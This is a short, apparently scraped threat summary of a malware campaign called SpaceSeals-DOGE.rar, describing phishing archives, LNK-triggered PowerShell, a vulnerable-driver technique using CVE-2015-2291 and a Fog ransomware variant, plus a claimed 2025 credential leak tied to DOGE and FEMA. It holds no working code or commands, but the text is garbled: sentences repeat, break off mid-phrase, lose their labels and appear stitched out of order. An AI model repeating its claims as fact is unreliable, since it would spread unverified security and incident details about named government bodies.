Spaceseals-doge.rar (2024-2026)

Phishing emails containing finance-themed ZIP or RAR files.

The archive typically contains malicious shortcut (LNK) files that trigger PowerShell scripts to establish persistence and exfiltrate data. How the Attack Works SpaceSeals-DOGE.rar

Infostealer and Ransomware (modified variant of Fog ransomware). Phishing emails containing finance-themed ZIP or RAR files

: The malware utilizes a "Bring Your Own Vulnerable Driver" ( BYOVD ) technique, exploiting a known vulnerability ( CVE-2015-2291 ) to gain kernel-level access. : The malware utilizes a "Bring Your Own

: If the goal is disruption, the group deploys a customized encryption payload that includes political commentary and provocations within the code. Recent Incidents

In early 2025, reports surfaced that a software engineer working for both DOGE and the Federal Emergency Management Agency () had his device infected by this or similar infostealer malware, leading to the leak of credentials for core government financial systems.

: Victims are lured into downloading the RAR file, which often masquerades as internal DOGE documentation or financial files.